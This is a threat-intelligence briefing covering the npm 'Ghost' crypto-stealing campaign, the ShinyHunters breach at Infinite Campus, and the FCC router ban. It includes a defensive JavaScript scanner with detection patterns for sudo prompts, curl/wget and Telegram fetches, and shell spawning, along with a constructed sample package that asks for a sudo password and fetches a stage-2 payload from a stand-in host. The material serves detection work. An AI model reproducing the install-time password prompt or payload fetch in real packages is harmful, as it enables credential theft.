Ankura CTIX FLASH Update – March 27, 2026

Malware Activity

Ghost Campaign Abuses npm Install Process to Deliver Stealthy Crypto-Stealing Malware

A newly identified supply chain attack campaign, dubbed the “Ghost campaign” by ReversingLabs, leverages malicious npm packages that mimic legitimate installation activity to covertly deploy malware targeting sensitive data and cryptocurrency wallets. First observed in early February 2026, the campaign uses deceptive techniques such as fake npm installation logs, including simulated dependency downloads, progress indicators, and delays, to create the illusion of a normal install process. During this staged execution, victims are prompted to enter their sudo password under the cover of resolving installation issues or performing optimizations, and the credentials are then used to execute a remote access trojan (RAT). The final payload is retrieved from external infrastructure, including Telegram channels and hidden web3-hosted content, decrypted using a remotely fetched key, and executed locally. The malware enables attackers to exfiltrate crypto wallet data, harvest sensitive information, and maintain command-and-control (C2) access. Code similarities across multiple packages suggest either an emerging campaign or an early-stage testing phase, aligning with a broader trend of increasingly sophisticated npm-based supply chain attacks. Researchers emphasize mitigation measures such as verifying package maintainers, scrutinizing install scripts, avoiding unnecessary privilege escalation, and leveraging automated security scanning tools to detect malicious dependencies. CTIX analysts will continue to report on novel malware strains and attack methods.
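The briefing's mitigation advice to scrutinize install scripts can be turned into a triage check. The script below is an added example, not code from ReversingLabs, Ankura, or any package the campaign used: it walks the npm lifecycle hooks in a package manifest, follows the local script file a hook runs, and flags the behaviours the write-up describes (sudo prompts, fetches from external infrastructure such as Telegram, decoded or eval'd payloads, shell spawning). The package representation (`{ manifest, files }`), the regular expressions, and the two sample packages are all constructed assumptions for the example.

```javascript
// Added example for this briefing; not code from ReversingLabs or Ankura.
// Audits npm lifecycle hooks (the install-time scripts the Ghost campaign abused)
// for the behaviours the write-up describes. Heuristic only: a triage aid for
// "scrutinize install scripts", not a malware classifier.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare",
  "preuninstall", "postuninstall"];

// Each pattern maps to a tactic from the campaign description (assumed patterns).
const SUSPICIOUS_PATTERNS = [
  { id: "privilege-escalation", re: /\bsudo\b|\bsu\s+-/,
    why: "install-time code references sudo/su (Ghost prompted victims for their sudo password)" },
  { id: "remote-fetch", re: /\b(curl|wget)\b|https?:\/\/|api\.telegram\.org|t\.me\//,
    why: "install-time code reaches external infrastructure (payloads and keys were fetched remotely)" },
  { id: "eval-decode", re: /\beval\(|new Function\(|["']base64["']|atob\(/,
    why: "install-time code decodes or evaluates embedded content" },
  { id: "shell-exec", re: /child_process|\b(bash|sh|zsh)\s+-c\b/,
    why: "install-time code spawns a shell or subprocess" },
];

// Pull relative script paths (foo.js, scripts/x.sh) out of a hook command so the
// file it runs is scanned too: "node scripts/setup.js" alone looks harmless.
function referencedFiles(command) {
  const refs = [];
  const re = /(?:^|\s)(?:\.\/)?([\w./-]+\.(?:js|cjs|mjs|sh))\b/g;
  let m;
  while ((m = re.exec(command)) !== null) refs.push(m[1]);
  return refs;
}

// pkg = { manifest: <package.json object>, files: { relativePath: contents } }
// Returns one finding per (hook, source, pattern) that matches.
function auditPackage(pkg) {
  const scripts = (pkg.manifest && pkg.manifest.scripts) || {};
  const files = pkg.files || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== "string") continue;
    const sources = [{ where: `scripts.${hook}`, text: command }];
    for (const ref of referencedFiles(command)) {
      if (typeof files[ref] === "string") sources.push({ where: ref, text: files[ref] });
    }
    for (const src of sources) {
      for (const p of SUSPICIOUS_PATTERNS) {
        if (p.re.test(src.text)) {
          findings.push({ package: pkg.manifest.name, hook, where: src.where, id: p.id, why: p.why });
        }
      }
    }
  }
  return findings;
}

function auditAll(packages) {
  return packages.flatMap(auditPackage);
}

// Constructed sample inputs (not real packages): a benign native addon whose
// install hook only compiles code, and a package shaped like the staged install
// the briefing describes (fake progress output, sudo prompt, remote stage-2 fetch).
const SAMPLE_PACKAGES = [
  {
    manifest: { name: "sample-native-addon", version: "1.0.0",
      scripts: { install: "node-gyp rebuild" } },
    files: {},
  },
  {
    manifest: { name: "sample-ghost-like", version: "0.0.3",
      scripts: { postinstall: "node scripts/setup.js" } },
    files: {
      "scripts/setup.js": [
        "// constructed illustration of the install-mimicking pattern, not real malware",
        'const { execSync } = require("child_process");',
        'console.log("Resolving dependencies... [====      ] 40%");',
        'const pw = askPassword("Optimizing install: sudo password required");',
        'const stage2 = download("https://example.invalid/stage2.bin");',
      ].join("\n"),
    },
  },
];

// Running the audit over the samples: the addon yields no findings, the
// ghost-like package yields three, all traced to scripts/setup.js.
console.log(JSON.stringify(auditAll(SAMPLE_PACKAGES), null, 2));
```

Legitimate packages that download prebuilt binaries in an install hook will trip the remote-fetch pattern, so treat hits as a review queue rather than a verdict. The complementary control the briefing's advice implies is to stop lifecycle hooks from running at all unless explicitly allowed: npm's `ignore-scripts` setting (`npm install --ignore-scripts`, or `ignore-scripts=true` in `.npmrc`) removes the execution path the campaign relies on, at the cost of having to rebuild native addons deliberately.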


Threat Actor Activity

ShinyHunters Behind Infinite Campus Data Breach, Targeting Salesforce Account

Infinite Campus, a leading K-12 student information system provider, has notified customers of a data breach following an extortion attempt by the threat group ShinyHunters. The attackers accessed an employee’s Salesforce account, exposing mostly publicly available information. Although Infinite Campus hasn’t issued an official statement, customers reported the breach online. ShinyHunters, known for targeting Salesforce accounts, threatened to leak the stolen data unless contacted by March 25, 2026. Infinite Campus, however, refuses to engage with the attackers. ShinyHunters claims to have stolen Salesforce records containing personally identifiable information (PII) and internal corporate data. Infinite Campus serves over 3,200 US school districts, managing data for 11 million students across forty-six (46) states. The company maintains that no customer databases were accessed and that the exposed data mainly consists of directory information commonly found on school websites. In response, Infinite Campus has disabled certain services that lacked IP restrictions to minimize potential data exposure and is scanning its Salesforce data for signs of compromise. The incident is reminiscent of the December 2024 PowerSchool hack, although its impact was smaller; the PowerSchool breach exposed sensitive information of 62 million students.


Vulnerabilities

FCC Bans Foreign-Made Consumer Routers Over Critical Infrastructure and Supply Chain Risks

The U.S. Federal Communications Commission (FCC) has announced a ban on the import and sale of new foreign-made consumer routers, citing significant cybersecurity and national security risks tied to supply chain vulnerabilities and exploitation by threat actors. Under the new policy, such routers are added to the Covered List unless they receive Conditional Approval from agencies like the Department of Homeland Security (DHS), effectively restricting their entry into the U.S. market while allowing continued use and sale of previously authorized devices. The decision follows findings that both state-sponsored and financially motivated actors have repeatedly leveraged insecure routers to enable network intrusions, espionage, password spraying, and large-scale botnet operations. Notably, China-linked groups tracked by multiple cybersecurity firms, including Volt Typhoon, Flax Typhoon, and Salt Typhoon, have used compromised routers to target U.S. critical infrastructure sectors, while the CovertNetwork-1658 (Quad7) botnet, attributed to Storm-0940, has facilitated stealthy credential attacks. The FCC emphasized that routers represent a high-value attack surface because of their role as network gateways: once compromised, they enable surveillance, data exfiltration, and malware delivery, which reinforces the urgency of mitigating risks associated with foreign-manufactured networking equipment. CTIX analysts will continue to report on critical vulnerabilities to both private and state agencies/users.


© Copyright 2026. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.
